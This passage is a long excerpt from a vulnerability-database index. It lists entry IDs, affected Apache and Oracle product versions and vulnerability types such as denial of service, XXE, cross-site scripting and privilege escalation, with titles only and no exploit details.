4398| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
4399| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
4400| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
4401| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
4402| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
4403| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
4404| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
4405| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
4406| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
4407| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
4408| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
4409| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
4410| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
4411| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
4412| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
4413| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
4414| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
4415| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
4416| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
4417| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
4418| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
4419| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
4420| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
4421| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
4422| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
4423| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
4424| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
4425| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
4426| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
4427| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
4428| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
4429| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
4430| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
4431| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
4432| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
4433| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
4434| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
4435| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
4436| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
4437| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
4438| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
4439| [123197] Apache Sentry up to 2.0.0 privilege escalation
4440| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
4441| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
4442| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
4443| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
4444| [122800] Apache Spark 1.3.0 REST API weak authentication
4445| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
4446| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
4447| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
4448| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
4449| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
4450| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
4451| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
4452| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
4453| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
4454| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
4455| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
4456| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
4457| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
4458| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
4459| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
4460| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
4461| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
4462| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
4463| [121354] Apache CouchDB HTTP API Code Execution
4464| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
4465| [121143] Apache storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
4466| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
4467| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
4468| [120168] Apache CXF weak authentication
4469| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
4470| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
4471| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
4472| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
4473| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
4474| [119306] Apache MXNet Network Interface privilege escalation
4475| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
4476| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
4477| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
4478| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
4479| [118143] Apache NiFi activemq-client Library Deserialization denial of service
4480| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
4481| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
4482| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
4483| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
4484| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
4485| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
4486| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
4487| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
4488| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
4489| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
4490| [117115] Apache Tika up to 1.17 tika-server command injection
4491| [116929] Apache Fineract getReportType Parameter privilege escalation
4492| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
4493| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
4494| [116926] Apache Fineract REST Hand Parameter privilege escalation
4495| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
4496| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
4497| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
4498| [115883] Apache Hive up to 2.3.2 privilege escalation
4499| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
4500| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
4501| [115518] Apache Ignite 2.3 Deserialization privilege escalation
4502| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
4503| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
4504| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
4505| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
4506| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
4507| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
4508| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
4509| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
4510| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
4511| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
4512| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
4513| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
4514| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
4515| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
4516| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
4517| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
4518| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
4519| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
4520| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
4521| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
4522| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
4523| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
4524| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
4525| [113895] Apache Geode up to 1.3.x Code Execution
4526| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
4527| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
4528| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
4529| [113747] Apache Tomcat Servlets privilege escalation
4530| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
4531| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
4532| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
4533| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
4534| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
4535| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
4536| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
4537| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
4538| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
4539| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
4540| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
4541| [112885] Apache Allura up to 1.8.0 File information disclosure
4542| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
4543| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
4544| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
4545| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
4546| [112625] Apache POI up to 3.16 Loop denial of service
4547| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
4548| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
4549| [112339] Apache NiFi 1.5.0 Header privilege escalation
4550| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
4551| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
4552| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
4553| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
4554| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
4555| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
4556| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
4557| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
4558| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
4559| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
4560| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
4561| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
4562| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
4563| [112114] Oracle 9.1 Apache Log4j privilege escalation
4564| [112113] Oracle 9.1 Apache Log4j privilege escalation
4565| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
4566| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
4567| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
4568| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
4569| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
4570| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
4571| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
4572| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
4573| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
4574| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
4575| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
4576| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
4577| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
4578| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
4579| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
4580| [110701] Apache Fineract Query Parameter sql injection
4581| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
4582| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
4583| [110393] Apple macOS up to 10.13.2 apache information disclosure
4584| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
4585| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
4586| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
4587| [110106] Apache CXF Fediz Spring cross site request forgery
4588| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
4589| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
4590| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
4591| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
4592| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
4593| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
4594| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
4595| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
4596| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
4597| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
4598| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
4599| [108938] Apple macOS up to 10.13.1 apache denial of service
4600| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
4601| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
4602| [108935] Apple macOS up to 10.13.1 apache denial of service
4603| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
4604| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
4605| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
4606| [108931] Apple macOS up to 10.13.1 apache denial of service
4607| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
4608| [108929] Apple macOS up to 10.13.1 apache denial of service
4609| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
4610| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
4611| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
4612| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
4613| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
4614| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
4615| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
4616| [108790] Apache storm 0.9.0.1 Log Viewer directory traversal
4617| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
4618| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
4619| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
4620| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
4621| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
4622| [108782] Apache Xerces2 XML Service denial of service
4623| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
4624| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
4625| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
4626| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
4627| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
4628| [108629] Apache OFBiz up to 10.04.01 privilege escalation
4629| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
4630| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
4631| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
4632| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
4633| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
4634| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
4635| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
4636| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
4637| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
4638| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
4639| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
4640| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
4641| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
4642| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
4643| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
4644| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
4645| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
4646| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
4647| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
4648| [108069] Oracle Endeca Information Discovery Integrator 2.4/3.0/3.1/3.2 Apache Commons Collections memory corruption
4649| [108067] Oracle Business Process Management Suite 11.1.1.9.0/12.2.1.1.0 Apache Commons Collections memory corruption
4650| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
4651| [108065] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Commons Collections memory corruption
4652| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
4653| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
4654| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
4655| [108024] Oracle Communications Order and Service Management 7.2.4.x.x/7.3.0.x.x/7.3.1.x.x/7.3.5.x.x Apache Commons Collections memory corruption
4656| [108015] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Commons Collections memory corruption
4657| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
4658| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
4659| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
4660| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
4661| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
4662| [107639] Apache NiFi 1.4.0 XML External Entity
4663| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
4664| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
4665| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
4666| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
4667| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
4668| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
4669| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
4670| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
4671| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
4672| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
4673| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
4674| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
4675| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
4676| [107197] Apache Xerces Jelly Parser XML File XML External Entity
4677| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
4678| [107084] Apache Struts up to 2.3.19 cross site scripting
4679| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
4680| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
4681| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
4682| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
4683| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
4684| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
4685| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
4686| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
4687| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
4688| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
4689| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
4690| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
4691| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
4692| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
4693| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
4694| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
4695| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
4696| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
4697| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
4698| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
4699| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
4700| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
4701| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
4702| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
4703| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
4704| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
4705| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
4706| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
4707| [105878] Apache Struts up to 2.3.24.0 privilege escalation
4708| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
4709| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
4710| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
4711| [105643] Apache Pony Mail up to 0.8b weak authentication
4712| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
4713| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
4714| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
4715| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
4716| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
4717| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
4718| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
4719| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
4720| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
4721| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
4722| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
4723| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
4724| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
4725| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
4726| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
4727| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
4728| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
4729| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
4730| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
4731| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
4732| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
4733| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
4734| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
4735| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
4736| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
4737| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
4738| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
